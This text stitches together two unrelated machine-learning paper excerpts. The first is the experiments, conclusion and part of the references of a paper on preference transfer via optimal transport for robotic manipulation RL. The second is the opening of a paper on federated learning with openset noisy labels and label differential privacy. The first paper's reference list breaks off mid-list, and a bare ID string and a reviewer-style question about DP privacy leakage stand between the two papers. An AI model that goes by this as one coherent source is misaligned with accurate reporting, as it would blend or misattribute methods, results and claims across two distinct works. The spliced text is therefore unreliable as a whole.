In this section, we first conduct experiments to evaluate our proposed method on several pairs of robotic manipulation tasks from Meta-World (Yu et al., 2020) and Robomimic (Mandlekar et al., 2022) in the zero-shot setting. We then demonstrate that our approach significantly surpasses existing methods in limited-data scenarios. Last, we evaluate our algorithm with different choices of cost functions and noise levels.

5.1 COMPARED METHODS AND TRAINING DETAILS

The following methods are included in the experimental evaluation:

• **PT** (Kim et al., 2023): The original PT algorithm trained from preference labels computed with the ground-truth rewards.
• **PT+Semi**: This baseline combines PT with semi-supervised learning, as proposed in the online feedback-efficient preference-based RL algorithm SURF (Park et al., 2022). The method infers pseudo preference labels for unlabeled data based on reward confidence.
• **IPL** (Hejna & Sadigh, 2023): An offline preference-based RL algorithm that learns policies without modeling reward functions.
• **PT+Dis**: A cross-task preference-based RL baseline that computes transferred preference labels simply from the trajectory similarity between tasks.
• **PT+POT (Ours)**: A zero-shot preference-based RL method that trains PT on preference labels transferred by POT.
• **RPT+POT (Ours)**: This method robustly learns RPT from POT labels by modeling reward distributions.
• **IPL+POT (Ours)**: This method learns from POT labels without reward functions.

**Implementation Details.** All methods are implemented based on the officially released code of PT\(^1\) and IPL\(^2\). RPT is implemented by replacing the preference attention layer of PT with two branches, each comprising a two-layer multi-layer perceptron (MLP), with the other settings identical to PT. Both PT and PT+Semi utilize scripted labels computed according to ground-truth rewards, which is a common practice for evaluating preference-based RL algorithms (Lee et al., 2021b; Liu et al., 2022; Kim et al., 2023). PT+POT, RPT+POT, and IPL+POT are trained with computed POT labels (zero-shot) or a mixture of POT labels and scripted labels (few-shot). All PT-based methods first train reward models using the preference data, and the offline RL algorithm IQL (Kostrikov et al., 2022) is then used for policy learning, following PT. For the IPL-based method, policies are learned directly from preferences. For the Meta-World benchmark, Button Press and Faucet Close serve as source tasks, while Window Open, Door Close, Drawer Open, and Sweep Into are evaluated as target tasks. For Robomimic, we set Square-mh as the source task, and Can-mh and Lift-mh as target tasks. The tasks and datasets used are detailed in Appendix C. We set the segment length to 50 for Meta-World tasks and 100 for Robomimic tasks. For the number of target-task preference labels, we provide 100 for Window Open and Door Close, 500 for Drawer Open, Can-mh, and Lift-mh, and 1000 for Sweep Into. The Euclidean function is employed as the cost function in the Gromov-Wasserstein distance alignment, with different cost functions discussed in Section 5.4. Regarding RPT learning, the margin \(\eta\) in Equation 8 is set to 100 for all experiments, with the effect of different margins evaluated in Appendix D. The number of samples \(K\) in Equation 7 is consistently set to 5. The weight \(\lambda\) in Equation 7 is 0.3 for Door Close with Button Press as the source task, and 0.1 for the other task pairs.
The trade-off \(\alpha\) in Equation 9 is set to 0.02 for Drawer Open with Button Press as the source task, and 0.01 for all other experiments. Detailed network architectures and hyperparameters of all methods and of IQL are presented in Appendix C.

The Meta-World and Robomimic tasks are evaluated by success rate. Each task is run with five random seeds, and the mean and standard deviation of the success rates are reported. Each run evaluates the policy by rolling out 50 episodes at every evaluation step, computing performance as the mean success rate over these 50 episodes. All experiments are run on NVIDIA GeForce RTX 3080 and NVIDIA Tesla V100 GPUs with 8 CPU cores.

5.2 RESULTS OF ZERO-SHOT PREFERENCE LEARNING

Table 1 shows the results on robotic manipulation tasks of Meta-World and Robomimic with different pairs of source and target tasks\(^3\). Among the baselines that use scripted preference labels, PT, PT+Semi, and IPL yield outstanding performance on the majority of tasks; PT achieves a mean success rate of 91.7% on the Meta-World tasks and 83.8% across all tasks. The performance of PT+Semi is almost the same as that of PT on the Meta-World tasks but drops on the Robomimic tasks. IPL outperforms PT and PT+Semi on Robomimic, while its performance on Meta-World is worse than both. By transferring preferences via OT, POT attains a mean accuracy of 74.9% in computing preference labels across all tasks. PT trained with POT labels realizes a 71.2% success rate, equating to 85.0% of oracle performance (i.e., the performance of PT trained with scripted labels). RPT, incorporating reward uncertainty in reward modeling, enhances performance to 78.1% across all tasks when trained with POT labels, equivalent to 93.2% of oracle performance. Also, IPL+POT achieves a 70.1% success rate across all tasks, equal to 87.0% of oracle performance. We can conclude that RPT+POT achieves competitive performance compared with the baselines trained with scripted preference labels. Both PT+POT and RPT+POT outperform PT+Dis by a large margin, and RPT+POT even exceeds PT on the Lift-mh task, demonstrating the powerful capabilities of POT and RPT in zero-shot preference transfer and robust learning.

Table 1: Success rate of our method against the baselines on robotic manipulation tasks of the Meta-World and Robomimic benchmarks. Results are reported as mean and standard deviation across five random seeds. PT, PT+Semi, and IPL are PbRL methods using scripted labels; PT+Dis, PT+POT, RPT+POT, and IPL+POT use transferred labels. POT Acc. denotes the accuracy of the transferred POT labels.

| Source Task | Target Task | PT | PT+Semi | IPL | PT+Dis | PT+POT | RPT+POT | IPL+POT | POT Acc. |
|---|---|---|---|---|---|---|---|---|---|
| Button Press | Window Open | 89.2 ±5.4 | 86.4 ±3.0 | 91.6 ±6.2 | 44.0 ±26.3 | 85.6 ±17.1 | 88.0 ±11.6 | 91.2 ±5.9 | 87.0 |
| Button Press | Door Close | 94.8 ±4.8 | 94.8 ±7.6 | 75.6 ±32.6 | 63.6 ±24.5 | 59.6 ±48.1 | 78.4 ±29.5 | 46.8 ±30.7 | 78.0 |
| Button Press | Drawer Open | 96.6 ±6.1 | 96.8 ±3.3 | 91.2 ±4.1 | 18.0 ±33.0 | 80.8 ±21.0 | 84.0 ±16.0 | 76.8 ±10.4 | 76.6 |
| Button Press | Sweep Into | 86.0 ±8.7 | 88.4 ±5.2 | 73.2 ±6.4 | 48.8 ±34.9 | 77.2 ±11.0 | 80.0 ±6.8 | 76.8 ±7.6 | 69.5 |
| Faucet Close | Window Open | 89.2 ±5.1 | 86.4 ±3.0 | 91.6 ±6.2 | 21.2 ±17.2 | 84.8 ±10.9 | 88.8 ±6.7 | 88.4 ±11.5 | 87.0 |
| Faucet Close | Door Close | 94.8 ±4.8 | 94.8 ±7.6 | 75.6 ±32.6 | 38.8 ±44.8 | 72.8 ±40.9 | 86.4 ±8.2 | 41.6 ±31.5 | 72.0 |
| Faucet Close | Drawer Open | 96.6 ±6.1 | 96.8 ±3.3 | 91.2 ±4.1 | 56.4 ±23.4 | 70.2 ±38.8 | 90.8 ±12.0 | 70.4 ±11.6 | 71.0 |
| Faucet Close | Sweep Into | 86.0 ±8.7 | 88.4 ±5.2 | 73.2 ±6.4 | 14.0 ±20.0 | 71.6 ±17.4 | 75.2 ±6.6 | 81.6 ±7.1 | 68.4 |
| Square-mh | Can-mh | 35.6 ±11.6 | 30.8 ±12.7 | 50.8 ±12.2 | – | 32.8 ±5.9 | 34.8 ±12.1 | 45.6 ±8.2 | 70.0 |
| Square-mh | Lift-mh | 68.8 ±19.2 | 60.8 ±7.3 | 92.4 ±3.3 | – | 62.0 ±19.1 | 74.4 ±23.1 | 81.6 ±6.1 | 63.2 |
| Average (without Robomimic) | | 91.7 | 91.6 | 82.9 | 38.1 | 76.5 | 84.0 | 71.7 | 76.9 |
| Average (all settings) | | 83.8 | 82.4 | 80.6 | – | 71.2 | 78.1 | 70.1 | 74.9 |

---
\(^1\) https://github.com/csmile-1006/PreferenceTransformer
\(^2\) https://github.com/hejna/inverse-preference-learning
\(^3\) PT, PT+Semi, and IPL do not require preference data from source tasks, so their results depend solely on the target tasks.
\(^4\) PT+Dis cannot transfer preferences from Square-mh to Lift-mh because the state dimensions of these two tasks are different.

5.3 RESULTS OF FEW-SHOT PREFERENCE LEARNING

The results in Table 1 show the strong zero-shot transfer ability of POT. To further balance human labeling cost and algorithm performance, we are interested in how well RPT+POT performs when only a small number of preference labels are available. For a fair comparison, we evaluate our method and PT with the same number of scripted preference labels of the target task, across $F_{\text{oracle}} \in \{0, 5, 10, 15, 20\}$. Our method additionally obtains $F_{\text{POT}} = 100 - F_{\text{oracle}}$ POT labels transferred from the source task. The results in Figure 3 show that RPT+POT significantly outperforms PT when oracle preference labels are scarce, and the advantage becomes more pronounced as the number of labels decreases. Moreover, RPT+POT even exceeds the oracle PT (i.e., PT with 100 scripted labels) on the Window Open task for $F_{\text{oracle}} \in \{5, 10, 15, 20\}$. These results demonstrate the excellent performance of our method when oracle labels are hard to obtain, showing that POT can substantially reduce human labeling.

Figure 3: Success rate on Door Close and Window Open with different numbers of scripted preference labels.

5.4 ABLATION STUDY

**Different Cost Functions.**
The sensitivity of POT to the cost function is examined by evaluating PT+POT and RPT+POT with varying cost functions, including the Euclidean and cosine functions. Table 2 demonstrates that POT performs robustly with either cost function.

Table 2: Success rates on three pairs of source and target tasks with different cost functions. Results are reported as the mean and standard deviation of the success rate across five runs.

| Source Task | Target Task | RPT+POT (Euclidean) | POT Acc. (Euclidean) | RPT+POT (Cosine) | POT Acc. (Cosine) |
|---|---|---|---|---|---|
| Button Press | Sweep Into | 80.0 ±6.8 | 69.5 | 79.2 ±5.4 | 65.0 |
| Faucet Close | Window Open | 88.8 ±6.7 | 87.0 | 92.4 ±3.6 | 91.0 |
| Square-mh | Lift-mh | 74.4 ±23.1 | 63.2 | 69.3 ±9.5 | 66.0 |
| **Average** | | 81.1 | 73.2 | 80.3 | 74.0 |

Notably, POT with the cosine function even attains 91.0% accuracy in computing POT labels on the Window Open task, and its success rate (92.4%) surpasses that of PT with scripted labels on this task (89.2%).

**Different Noise Levels.** To evaluate the performance of PT and RPT under different noise levels, we conduct experiments with 10%, 20%, and 30% noisy labels, induced by flipping scripted labels. The results in Figure 4 reveal the enhanced robustness of RPT to label noise, with RPT significantly outperforming PT at higher noise levels.

Figure 4: Success rate on Sweep Into and Window Open under different noise levels.

6 CONCLUSION

In this paper, we present POT, a novel cross-task preference-based RL algorithm that leverages the Gromov-Wasserstein distance to align trajectory distributions across different tasks and transfers preference labels through the optimal transport matrix. POT needs only a small amount of preference data from prior tasks, eliminating the need for a substantial amount of pre-collected preference data or extensive human queries. Furthermore, we propose the Robust Preference Transformer, which models reward uncertainty rather than scalar rewards to learn robustly from POT labels. Empirical results on various robotic manipulation tasks of Meta-World and Robomimic demonstrate the effectiveness of our method in transferring accurate preference labels in a zero-shot manner and in improving the robustness of learning from noisy labels. Additionally, our method significantly surpasses current methods when only a few preference labels are available. By minimizing human labeling costs to a great extent, POT paves the way for practical applications of preference-based RL algorithms.

**Limitations.** Our method does present certain limitations. First, it is not well-suited to high-dimensional inputs, because optimal transport can become slow when working with such inputs. Second, the efficiency of our algorithm relies on the source and target tasks sharing the same action space, so our method is not suitable for tasks with completely different state and action spaces. A potential solution may be to utilize representation learning methods to obtain trajectory representations and to use the Gromov-Wasserstein distance to align in the representation space (Chen et al., 2020; Li et al., 2022). We recognize these limitations and view their mitigation as an important direction for future exploration and development.

REPRODUCIBILITY STATEMENT

The source code will be provided in an anonymous repository, and we will post it as a comment in the discussion phase.
If the paper is accepted, we will open source the code on our website. The experimental details are included in Section 5.1 and Appendix C. REFERENCES Yuntao Bai, Andy Jones, Kamal Ndousse, Amanda Askell, Anna Chen, Nova DasSarma, Dawn Drain, Stanislav Fort, Deep Ganguli, Tom Henighan, et al. Training a helpful and harmless assistant with reinforcement learning from human feedback. arXiv preprint arXiv:2204.05862, 2022. Christopher Berner, Greg Brockman, Brooke Chan, Vicki Cheung, Przemyslaw Debiak, Christy Dennison, David Farhi, Quirin Fischer, Shariq Hashme, Christopher Hesse, Rafal Józefowicz, Scott Gray, Catherine Olsson, Jakub Pachocki, Michael Petrov, Henrique Pondé de Oliveira Pinto, Jonathan Raiman, Tim Salimans, Jeremy Schlatter, Jonas Schneider, Szymon Sidor, Ilya Sutskever, Jie Tang, Filip Wolski, and Susan Zhang. Dota 2 with large scale deep reinforcement learning. CoRR, abs/1912.06680, 2019. Ralph Allan Bradley and Milton E Terry. Rank analysis of incomplete block designs: I. the method of paired comparisons. Biometrika, 39(3/4):324–345, 1952. Jie Chang, Zhonghao Lan, Changmao Cheng, and Yichen Wei. Data uncertainty learning in face recognition. In Proceedings of the IEEE/CVF conference on computer vision and pattern recognition, pp. 5710–5719, 2020. Liqun Chen, Zhe Gan, Yu Cheng, Linjie Li, Lawrence Carin, and Jingjing Liu. Graph optimal transport for cross-domain alignment. In International Conference on Machine Learning (ICML), pp. 1542–1553. PMLR, 2020. Paul F Christiano, Jan Leike, Tom Brown, Miljan Martic, Shane Legg, and Dario Amodei. Deep reinforcement learning from human preferences. In Advances in Neural Information Processing Systems (NeurIPS), volume 30. Curran Associates, Inc., 2017. Samuel Cohen, Brandon Amos, Marc Peter Deisenroth, Mikael Henaff, Eugene Vinitsky, and Denis Yarats. Imitation learning from pixel observations for continuous control. In Deep RL Workshop NeurIPS 2021, 2021. URL https://openreview.net/forum?id=Xe5MFhFvYGX. Robert Dadashi, Leonard Hussenot, Matthieu Geist, and Olivier Pietquin. Primal wasserstein imitation learning. In International Conference on Learning Representations (ICLR), 2021. URL https://openreview.net/forum?id=TtYSU29zgR. Bharath Bhushan Damodaran, Benjamin Kellenberger, Rémi Flamary, Devis Tuia, and Nicolas Courty. Deepjdot: Deep joint distribution optimal transport for unsupervised domain adaptation. In Proceedings of the European conference on computer vision (ECCV), pp. 447–463, 2018. Arnaud Fickinger, Samuel Cohen, Stuart Russell, and Brandon Amos. Cross-domain imitation learning via optimal transport. In International Conference on Learning Representations (ICLR), 2022. URL https://openreview.net/forum?id=xP3cPg2hQC. Rémi Flamary, Nicolas Courty, Alexandre Gramfort, Mokhtar Z Alaya, Aurélie Boisbunon, Stanislas Chambon, Laetitia Chapel, Adrien Corenflos, Kilian Fatras, Nemo Fournier, et al. Pot: Python optimal transport. The Journal of Machine Learning Research, 22(1):3571–3578, 2021. Siddhant Haldar, Vaibhav Mathur, Denis Yarats, and Lerrel Pinto. Watch and match: Supercharging imitation with regularized optimal transport. In Conference on Robot Learning (CoRL), pp. 32–43. PMLR, 2023a. Siddhant Haldar, Jyothish Pari, Anant Rai, and Lerrel Pinto. Teach a robot to fish: Versatile imitation from one minute of demonstrations. arXiv preprint arXiv:2303.01497, 2023b. Joey Hejna and Dorsa Sadigh. Inverse preference learning: Preference-based rl without a reward function. arXiv preprint arXiv:2305.15363, 2023.
TfbpnxTJt3
If the server does not aggregate the DP private label feedback by users, but only uses the DP private label of any individual user to perform the steps in line 9 of Algorithm 1, can the server calculate the real local label distribution of the user? Does this imply a leak of privacy?
Federated Learning with Local OpenSet Noisy Labels

Anonymous authors
Paper under double-blind review

Abstract

Federated learning is a learning paradigm that allows the central server to learn from different data sources while keeping the data private locally. Without controlling and monitoring the local data collection process, the locally available training labels are likely noisy, i.e., the collected training labels differ from the unobservable ground truth. Additionally, in heterogeneous FL, each local client may only have access to a subset of the label space (referred to as openset label learning), which may not overlap with those of other clients. In this work, we study the challenge of federated learning with local openset noisy labels. We observe that many existing solutions in the noisy label literature, e.g., loss correction, are ineffective during local training due to overfitting to noisy labels and failing to generalize to openset labels. To address these problems, we design a label communication mechanism that shares randomly selected "contrastive labels" among clients. The privacy of the shared contrastive labels is protected by label differential privacy (DP). Both the DP guarantee and the effectiveness of our approach are theoretically guaranteed. Compared with several baseline methods, our solution demonstrates its effectiveness on several public benchmarks and real-world datasets under different noise ratios and noise models.

1 Introduction

Data heterogeneity is a common issue among different data centers. The label spaces of the data centers are likely different due to the heterogeneity of data sources. For example, the virus variants during a pandemic may differ across regions, leading to an extremely heterogeneous data distribution among data centers. This heterogeneity challenges collaborations among data centers, e.g., federated learning (FL), where each data center joins as a client to train a uniform and stronger global model for all regions without sharing the sensitive data. In addition to a heterogeneous label space, to make matters worse, the observed label space may be noisy due to the limited knowledge access between different data centers, making this problem even more challenging.

This paper aims to provide solutions for a practical FL setting where not only does each client's training labels carry a different noise rate, but the observed label spaces at these clients can also be noisy and differ, even though their underlying clean labels are drawn from the same label space. We say that such a federated learning system has a local openset noise problem if the observed label space is noisy and differs across clients.

The above local openset label noise poses significant challenges if we apply existing learning-with-noisy-labels solutions locally at each client. For instance, a good number of these existing solutions operate with centralized training data and rely on the design of robust loss functions (Natarajan et al., 2013; Patrini et al., 2017; Ghosh et al., 2017; Zhang & Sabuncu, 2018; Feng et al., 2021; Wei & Liu, 2021; Zhu et al., 2021a). Implementing these approaches often requires assumptions that are likely to be violated if we directly employ these centralized solutions in a federated learning setting.
For example, loss correction is a popular design of robust loss functions (Patrini et al., 2017; Natarajan et al., 2013; Liu & Tao, 2015; Scott, 2015; Jiang et al., 2022), where the key step is to estimate the label noise transition matrix correctly (Bae et al., 2022; Zhang et al., 2021b; Zhu et al., 2021b, 2022). When the ground-truth labels are unavailable, correctly estimating the label noise transition matrix requires observing the full label space. In FL, where the transition matrix is often estimated only from the local openset noisy labels, existing estimators of the noise transition matrix fail. Moreover, even if we could obtain the best possible estimate of the noise transition matrix, e.g., given the ground-truth labels of the local instances, the absence of some label classes would make the estimate differ from the ground-truth one and again lead to failures (detailed example in Section 3.1).

Intuitively, we may share some label information among the clients to generalize centralized training methods to FL. However, doing so conflicts with privacy protection, making it challenging in real usage. Moreover, it is also important to figure out what kind of label information is sufficient to solve the local openset noise problem in FL. In this paper, we use the global label distribution as a hint to local clients, where the hint is used in a contrastive way to avoid overfitting to noisy labels. To protect privacy during label communication, we randomly flip the shared labels to ensure label differential privacy (DP). Our contributions are summarized as follows.

- We formally define the openset noise problem in FL, which is more practical than the existing heterogeneous noisy label assumptions. We also motivate the challenges that come with openset noise by analyzing the failure cases of popular noisy-learning solutions such as loss correction (Natarajan et al., 2013; Patrini et al., 2017; Liu & Tao, 2015).
- We propose a novel framework, FedDPCont, to solve the openset label noise problem, which builds on the idea of using globally shared private contrastive labels to avoid overfitting to local noisy labels.
- To bridge the gap between the centralized usage of noisy labels and the federated one, we propose a label communication algorithm with a differential privacy (DP) guarantee. We also prove that, benefiting from label communication, the gradient update of aggregating local losses with private labels is guaranteed to be the same as that of the corresponding centralized loss, and we further establish its robustness to label noise.
- We empirically compare FedDPCont with several baseline methods on both benchmark datasets and practical scenarios, showing that, in terms of FL with openset label noise, directly applying centralized solutions locally does not work and FedDPCont significantly improves the performance.

2 RELATED WORKS

Federated learning is a collaborative training method that makes full use of data from every client without sharing the data. FedSGD (Shokri & Shmatikov, 2015) passes gradients between the server and the clients; to improve performance, FedAvg (McMahan et al., 2017) instead communicates model weights. In practice, the openset problem is common in FL because the data sources of the clients may vary greatly, and it is very likely that some classes are unique to specific clients.
Many works analyze and address the non-IID problem in FL (Zhao et al., 2018; Li et al., 2019, 2021; Zhang et al., 2021a; Li et al., 2020b; Karimireddy et al., 2020; Andreux et al., 2020).

Label noise is common in the real world (Agarwal et al., 2016; Xiao et al., 2015; Zhang et al., 2017; Wei et al., 2022b). Traditional works on noisy labels usually assume the label noise is class-dependent, where the noise transition probability from a clean class to a noisy class depends only on the label class. There are many statistically guaranteed solutions based on this assumption (Natarajan et al., 2013; Menon et al., 2015; Liu & Tao, 2015; Liu & Guo, 2020). However, this assumption fails to model the situation where different groups of data have different noise patterns (Wang et al., 2021). For example, different clients are likely to have different noisy label spaces, resulting in totally different underlying noise transitions. Existing works on federated learning with noisy labels mainly assume the noisy label spaces are identical across different clients (Yang et al., 2022; Xu et al., 2022). There are other notable centralized solutions relying on the memorization effect of a large model (e.g., a deep neural network) (Li et al., 2020a; Liu, 2021; Song et al., 2019; Xia et al., 2021; Liu et al., 2020; Cheng et al., 2020). However, in a federated learning system, simply relying on the memorization effect would fail, i.e., the model can perfectly memorize all local noisy samples during local training, since the local data is likely to be imbalanced and limited in amount (Han et al., 2020; Liu, 2021). The idea of contrastive labels is to penalize overfitting, which is supposed to prevent memorizing openset local noisy samples. Besides, the concept "openset" is also used in Tuor et al. (2021), where the focus is on out-of-distribution features whose labels are called openset noise. It is different from ours since they did not focus on in-distribution mislabeled data.

3 FORMULATIONS AND MOTIVATIONS

**Federated learning** Consider a $K$-class classification problem in a federated learning system with $C$ clients. Each client $c \in [C] := \{1, \cdots, C\}$ holds a local dataset $D_c := \{(x_n^c, y_n^c)\}_{n \in [N_c]}$, where $N_c$ is the number of instances in $D_c$ and $[N_c] := \{1, \cdots, N_c\}$. Assume there is no overlap among $D_c$, $\forall c$. Denote the union of all the local datasets by $D := \{(x_n, y_n)\}_{n \in [N]}$. Clearly, we have $D = \bigcup_{c \in [C]} D_c$ and $N = \sum_{c \in [C]} N_c$. Denote by $\mathcal{D}_c$ the local data distribution, $(X^c, Y^c) \sim \mathcal{D}_c$ the local random variables of feature and label, $\mathcal{D}$ the global/centralized data distribution, and $(X, Y) \sim \mathcal{D}$ the corresponding global random variables. Denote by $\mathcal{X}$, $\mathcal{X}_c$, $\mathcal{Y}$, and $\mathcal{Y}_c$ the spaces of $X$, $X^c$, $Y$, and $Y^c$, respectively. FL builds on the following distributed optimization problem:

$$\arg\min_\theta \sum_{c \in [C]} \frac{N_c}{N} \cdot L_c(\theta),$$

where $\theta$ denotes the parameters of the classifier $f$, whose hard prediction is $\arg\max_{i \in [K]} f_i$. To this end, local training and global model averaging are executed iteratively.
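As a minimal sketch of this iterate, the following implements one FedAvg-style round, assuming PyTorch models; the client attributes and the `local_update` callback (which runs the local empirical-risk minimization described next) are illustrative placeholders.

```python
import copy
import torch

def fedavg_round(global_model, clients, local_update):
    """One round: broadcast the global model, train locally, then average
    the local parameters with weights N_c / N."""
    n_total = sum(c.num_samples for c in clients)
    avg_state = None
    for c in clients:
        local_model = copy.deepcopy(global_model)   # broadcast theta
        local_update(local_model, c)                # minimize L_c on D_c
        w = c.num_samples / n_total                 # weight N_c / N
        state = local_model.state_dict()
        if avg_state is None:
            avg_state = {k: w * v.clone().float() for k, v in state.items()}
        else:
            for k, v in state.items():
                avg_state[k] += w * v.float()
    # theta <- sum_c (N_c / N) * theta_c
    global_model.load_state_dict(avg_state)
    return global_model
```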
In local training, each client learns a model $f_c : \mathcal{X} \to \mathcal{Y}$ with its local dataset $D_c$ by minimizing the empirical loss $L_c(\theta_c)$ defined as:

$$L_c(\theta_c) := \frac{1}{N_c} \sum_{n \in [N_c]} \ell(f_c(x_n^c; \theta_c), y_n^c),$$

where for classification problems the loss function is usually the cross-entropy (CE) loss:

$$\ell(f(X; \theta), Y) = -\ln(f(X; \theta)[Y]), \quad Y \in [K],$$

i.e., the negative logarithm of the $Y$-th element of $f$ given input $X$ and model parameters $\theta$. In the following global model average, each client $c$ sends its model parameters $\theta_c$ to the central server, which aggregates them following FedAvg (McMahan et al., 2017):

$$\theta = \sum_{c \in [C]} \frac{N_c}{N} \cdot \theta_c.$$

3.1 Openset noise in Federated Learning

When the label $y$ is corrupted, the clean dataset $D$ becomes the noisy dataset $\tilde{D} := \{(x_n, \tilde{y}_n)\}_{n \in [N]}$, where the noisy label $\tilde{y}_n$ is possibly different from $y_n$. The noisy data $(x_n, \tilde{y}_n)$ can be viewed as a realization of the random variables $(X, \tilde{Y})$ drawn from the distribution $\tilde{\mathcal{D}}$.

The noise transition matrix $T$ characterizes the relationship between $(X, Y)$ and $(X, \tilde{Y})$. The shape of $T$ is $K \times K$, where $K$ is the number of classes in $D$. The $(i, j)$-th element of $T$ represents the probability of flipping a clean label $Y = i$ to noisy label $\tilde{Y} = j$, i.e., $T_{ij} := \mathbb{P}(\tilde{Y} = j | Y = i)$. If $\tilde{Y} = Y$ always holds, $T$ is the identity matrix. Note that the above definition builds on the assumption that $T$ is class-dependent, which is a common assumption in centralized learning with noisy labels (Natarajan et al., 2013; Menon et al., 2015; Liu & Tao, 2015). However, in FL, $T$ is likely to be different for different clients (a.k.a. group-dependent (Wang et al., 2021)). Specifically, we use $T$ to denote the global noise transition matrix for $\tilde{D}$ and $T_c$ to denote the local noise transition matrix for $\tilde{D}_c$.

In a practical federated learning scenario where the data across different clients are non-IID, different clients may have different label spaces. When the labels are noisy, we naturally have the following definition of openset label noise in FL.

**Definition 1 (Openset noisy labels in FL).** The label noise in client $c$ is called openset if $\tilde{\mathcal{Y}}_c \neq \tilde{\mathcal{Y}}$, where $\tilde{\mathcal{Y}}_c$ and $\tilde{\mathcal{Y}}$ denote the local and global noisy label spaces, respectively.

**Generation of openset noise** We propose the following noise generation process to model openset label noise in practical FL systems. Denote by $I_{c,k}$ the indicator random variable that label class $k$ is included in client $c$, where $I_{c,k} = 1$ (w.p. $Q_{c,k}$) indicates client $c$ has data belonging to class $k$ and $I_{c,k} = 0$ otherwise. The indicators $\{I_{c,k} \mid \forall c \in [C], k \in [K]\}$ are generated independently with the probability matrix $Q$, whose $(c, k)$-th element is $Q_{c,k} := \mathbb{E}[I_{c,k}]$. In practice, if all the elements in $\{I_{c,k} \mid k \in [K]\}$ are identical, meaning client $c$ observes either none or all of the classes, then $\{I_{c,k} \mid k \in [K]\}$ is re-generated until client $c$ is an openset client. Denote by $I_k := \{c \mid I_{c,k} = 1, c \in [C]\}$ the set of clients that include class $k$, and by $\tilde{D}^{(k)} := \{n \mid \tilde{y}_n = k\}$ the indices of instances that are labeled as class $k$.
For each $k \in [K]$, instances in $\tilde{D}^{(k)}$ are distributed to the clients with $I_{c,k} = 1$ either uniformly or non-uniformly, as follows.

- **Uniform allocation**: Randomly sample (without replacement) $|\tilde{D}^{(k)}| / |I_k|$ indices from $\tilde{D}^{(k)}$ and allocate the corresponding instances to client $c$. Repeat for all $c \in I_k$.
- **Non-uniform allocation**: Generate probabilities $\{u_c \mid c \in I_k\}$ from the Dirichlet distribution $\text{Dir}(\mathbf{1})$ with parameter $\mathbf{1} := [1, \cdots, 1]$ ($|I_k|$ values). Randomly sample (without replacement) $|\tilde{D}^{(k)}| \cdot u_c$ indices from $\tilde{D}^{(k)}$ and allocate the corresponding instances to client $c$. Repeat for all $c \in I_k$.

In this way, all the clients have openset label noise, i.e., $\tilde{\mathcal{Y}}_c \neq \tilde{\mathcal{Y}}, \forall c \in [C]$.

**Example** Consider the following example. For a data distribution $(X, Y) \sim \mathcal{D}$ where $Y \in \mathcal{Y} := \{1, 2, \cdots, K\}$, the set of all possible opensets consists of all subsets of $\mathcal{Y}$ except the full set and the empty set. For example, if $\mathcal{Y} = \{1, 2, 3\}$, there would be $2^K - 2 = 6$ different noisy label spaces: $\{1\}, \{2\}, \{3\}, \{1, 2\}, \{1, 3\}, \{2, 3\}$. Note that it is still possible that the union over all clients does not cover $\mathcal{Y}$.

An example of the real and openset $T$ in a 3-class classification problem is as follows. Suppose the real noise transition matrix is $T_{\text{real}}$ below. However, if we only observe $\tilde{\mathcal{Y}}_c = \{1, 2\}$ in client $c$, the optimal estimate of $T$ relying only on $\tilde{D}_c$ can only be $T_{\text{OptEst}}$, even if we know $D_c$. This is because when $\tilde{\mathcal{Y}}_c = \{1, 2\}$, we have $\mathbb{P}(\tilde{Y} = 3) = 0 \Rightarrow \mathbb{P}(\tilde{Y} = 3 | Y = 3) = 0$, so the other two probabilities in the third row have to be normalized from $(1/16, 3/16)$ to $(1/4, 3/4)$ to sum to 1.

$$T_{\text{real}} = \begin{bmatrix} 1 & 0 & 0 \\ 1/3 & 2/3 & 0 \\ 1/16 & 3/16 & 3/4 \end{bmatrix}, \quad T_{\text{OptEst}} = \begin{bmatrix} 1 & 0 & 0 \\ 1/3 & 2/3 & 0 \\ 1/4 & 3/4 & 0 \end{bmatrix}$$

**Local openset noise is challenging** A good number of correction approaches in the learning-with-noisy-labels literature require the transition matrix $T$. For instance, loss correction (Patrini et al., 2017) is a popular tool to solve the noisy label problem via

$$\ell^\rightarrow(f(X), \tilde{Y}) := \ell(T^\top f(X), \tilde{Y}),$$

where $T^\top$ is the transpose of $T$. The key step of the loss correction approach is to estimate a correct $T$. However, if the label space is openset, even the best estimate of $T$ leads to wrong predictions. Based on the example above, the best-corrected output is

$$T^\top f(X) = \begin{bmatrix} 1 & 1/3 & 1/4 \\ 0 & 2/3 & 3/4 \\ 0 & 0 & 0 \end{bmatrix} \begin{bmatrix} f_1(X; \theta) \\ f_2(X; \theta) \\ f_3(X; \theta) \end{bmatrix} = \begin{bmatrix} f_1(X; \theta) + f_2(X; \theta)/3 + f_3(X; \theta)/4 \\ 2f_2(X; \theta)/3 + 3f_3(X; \theta)/4 \\ 0 \end{bmatrix},$$

where $f = [f_1, f_2, f_3]^\top$ and $f_i$ is the $i$-th element of $f$. The model cannot distinguish class 3, which is reasonable. However, it will misclassify class 2 as class 3 because class 3 has a larger weight: given an instance $(x, y = 2)$, the corrected cross-entropy loss is $-\ln(2f_2(x; \theta)/3 + 3f_3(x; \theta)/4)$, which is minimized at $f_3(x; \theta) = 1$, making the loss correction fail.

3.2 Our Motivation and Building Idea

The above example highlights the challenge of adapting approaches that use the noise transition matrix $T$ to our openset FL setting. Therefore, we circumvent it by building our solution upon ideas that do not require knowledge of $T$. According to the previous analyses, the main difficulty of local openset label noise lies in the mismatch between the clean and noisy label spaces within a local client. Changing the label space is challenging in FL since it often requires sharing data between clients. Therefore, we need to solve two technical challenges: 1) What kind of information can be shared to mitigate the heterogeneity introduced by local openset label noise? 2) How do we use the shared information to help training?

For the first challenge, we consider sharing "private labels", since sharing only labels without disclosing features is usually less sensitive than sharing features in many cases, e.g., face recognition. Additionally, it is relatively easy to protect label privacy by random responses (Ghazi et al., 2021). For the second challenge, given only the private labels, we propose to use them "contrastively" to penalize the overfitting of noisy labels. Intuitively, for a multi-class classification task, e.g., with 10 classes, a randomly picked private label $\tilde{y}_n'$ is likely to be a wrong label for a randomly picked feature $x_n$. Therefore, rather than guiding the model to memorize this pattern, we can use it contrastively, or negatively, i.e., $-\ell(f(x_n), \tilde{y}_n')$. The new loss function with Private Labels therefore becomes

$$\ell_{PL}(f(x_n), \tilde{y}_n, \tilde{y}_n') := \ell(f(x_n), \tilde{y}_n) - \ell(f(x_n), \tilde{y}_n').$$

